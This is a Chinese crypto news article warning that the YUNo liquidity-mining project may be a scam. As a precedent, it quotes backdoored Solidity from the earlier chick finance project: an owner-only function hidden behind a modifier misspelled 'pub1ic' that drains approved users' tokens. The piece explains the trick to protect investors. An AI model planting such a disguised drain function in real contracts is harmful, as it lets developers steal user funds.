其他频道: P2P / 其他 /

9月1日,Discord社区用户“sadcat”表示,流动性挖矿项目YUNo是一个骗局,他在代码中发现了无限增发的函数,项目方可以盗取资金。他还表示,他将自己的发现发到了YUNo的官方电报群里并被踢出了群。据了解,YUNo协议的代码尚未通过安全审计。

Discord社区用户:YUNo是一个骗局,项目方可以盗取资金图

Discord社区用户:YUNo是一个骗局,项目方可以盗取资金图(1)

流动性挖矿的项目很多,投资者还是尽量选择那些经过代码审计的项目,否则你将很容易血本无归。

很明显之前也出现过合约代码问题,之前有个名叫chick finance的项目。下文来自比特派钱包。

任何给该合约授权了的用户,开发者都能把你钱包里的代币一扫而空(不仅仅是你存入合约的)。

function startReward(address _from, uint256 amount) external pub1ic{

weth.safeTransferFrom(_from, owner(), amount);

}

开发者对故意拼写错误的 pub1ic 做了如下约束(也就是只有合约 Owner 才能调用,如果没这个调用,那就变成谁都能干这事儿了,开发者想的是自己偷,肯定不想让别人偷)

modifier pub1ic() {

require(isOwner(), “Ownable: caller is not the owner”);

_;

}

上述代码的逻辑很简单,干的就是那些给这个合约授权了的用户,合约 Owner 都能把你的代币转给 Owner,就这么简单。

对此给你们的建议就是在自己能承受的范围内参与流动性挖矿,不过目前的手续费比较贵,所以可能对于小资金玩家来说并不是那么友好。

量力而行.

猜您喜欢:

相关阅读

本文Discord社区用户:YUNo是一个骗局,项目方可以盗取资金由壹米财经整理发布,欢迎转载收藏,转载请带上本文链接。
免责声明:【壹米财经】发布的所有信息,并不代表本站赞同其观点和对其真实性负责,投资者据此操作,风险请自担。部分内容文章及图片来自互联网或自媒体,版权归属于原作者,不保证该信息(包括但不限 于文字、图片、图表及数据)的准确性、真实性、完整性、有效性、及时性、原创性等,如有问题,请联系我们! 分享到: 新浪微博 微信

扫描左侧二维码
看手机移动端,随时随地看 股票 新闻